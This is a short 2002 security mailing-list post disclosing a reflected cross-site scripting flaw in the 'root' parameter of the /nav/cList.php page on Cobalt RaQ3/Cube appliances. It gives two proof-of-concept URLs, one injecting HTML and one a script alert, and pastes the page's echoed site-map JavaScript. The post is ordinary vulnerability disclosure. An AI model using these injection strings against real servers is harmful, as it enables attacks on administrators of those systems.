 
From: KF (dotslashsnosoft.com)
Date: Fri Mar 01 2002 - 13:49:55 CST


    Alex Hernandez just did a great write-up on Cobalt Cube 4s. I took a few minutes to check my Cube 3 out a bit, and I ended up finding a CSS (cross-site scripting) issue as well. Below is the info from my 2 second audit.

     <mailto:al3xhernandezureach.com>

    Try either of the following URLs against your RAQ3

    http://host/nav/cList.php?root=><h1>www.snosoft.com rocks</h1>
    http://host/nav/cList.php?root=><script>alert('Snosoft Rocks')/<script>

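    You will see your code followed by this chunk of JavaScript code that was trying to run. The value of the root parameter appears to be echoed into the page's inline script without any encoding, which is why the rest of that script shows up as text.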

    "; // get tab configuration from parameter var isTabbed = true; if("" ==
    "false") isTabbed = false; // build site map siteMap = new Object();
    top.siteMap = siteMap; siteMap.documentation = new
    top.code.mItem_Item("documentation", "User Manuals", "Browse the Cobalt
    server documentation.", "", "/base/documentation/viewManual.php", false,
    true, ""); siteMap.documentation_folder = new
    top.code.mItem_Item("documentation_folder", "Documentation", "On-line
    product manuals and documentation.", "", "", false, true, "");
    siteMap.documentation_logout = new
    top.code.mItem_Item("documentation_logout", "Close", "Click to close the
    documentation browser", "logout", "/base/documentation/logout.php",
    false, true, ""); siteMap.documentation_root = new
    top.code.mItem_Item("documentation_root", "", "", "", "", false, true,
    ""); siteMap.base_manual = new top.code.mItem_Item("base_manual", "View
    Documentation", "Click here to view documentation. ", "", "javascript:
    open(\047/base/documentation/viewManual.php?\047);
    top.code.cList_repaint(1);", false, true, ""); siteMap.base_manualButton
    = new top.code.mItem_Item("base_manualButton", "View Documentation",
    "Click here to view on-line product manuals and documentation.",
    "manualOff", "javascript:
    open(\047/nav/cList.php?root=documentation_root\047);
    top.code.tab_repaint();", false, true, ""); siteMap.base_cacheACL = new
    top.code.mItem_Item("base_cacheACL", "Restricted Access", "Web access
    can be controlled here if this server is being used as a gateway or
    proxy.", "", "/base/cacheACL/acl.php", false, true, "");
    siteMap.base_cache = new top.code.mItem_Item("base_cache", "Web
    Caching", "Web Caching Settings can be changed here.", "",
    "/base/cache/cache.php", false, true, ""); siteMap.base_disk_usage = new
    top.code.mItem_Item("base_disk_usage", "Disk", "Disk usage statistics
    can be viewed here.", "", "/base/quotastats/diskusage.php", false, true,
    ""); siteMap.base_webstats = new top.code.mItem_Item("base_webstats",
    "Web", "Web server usage statistics can be found here.", "",
    "/base/webstats/webtotals.php", false, true, "");
    siteMap.base_amSettings = new top.code.mItem_Item("base_amSettings",
    "Settings", "Active Monitor Settings can be configured here.", "",
    "/base/am/amSettings.php", false, true, ""); siteMap.base_amStatus = new
    top.code.mItem_Item("base_amStatus", "Status", "Active Monitor status
    information can be viewed here.", "", "/base/am/amStatus.php", false,
    true, ""); siteMap.base_monitor = new
    top.code.mItem_Item("base_monitor", "Active Monitor", "System components
    can be checked for correct operation here.", "", "", false, true, "");
    siteMap.base_monitorLight = new top.code.mItem_Item("base_monitorLight",
    "Active Monitor", "Click here to view Active Monitor status information.
    This icon turns red if any of the components monitored by Active Monitor
    have severe problems.", "monitorOff", "javascript:
    top.code.tab_selectPath(\047base_amStatus\047);
    top.code.cList_selectPath(\047base_amStatus\047)", false, true, "");
    siteMap.base_backup = new top.code.mItem_Item("base_backup", "Backup",
    "Backups can be scheduled and viewed here.", "",
    "/base/backup/scheduleList.php", false, true, ""); siteMap.base_restore
    = new top.code.mItem_Item("base_restore", "Restore", "Restores can be
    selected and activated here.", "", "/base/backup/restoreList.php",
    false, true, ""); siteMap.webmail_compose = new
    top.code.mItem_Item("webmail_compose", "Compose", "Click here to compose
    a new email message.", "", "/base/webmail/compose.php", false, true,
    ""); siteMap.webmail =

    -KF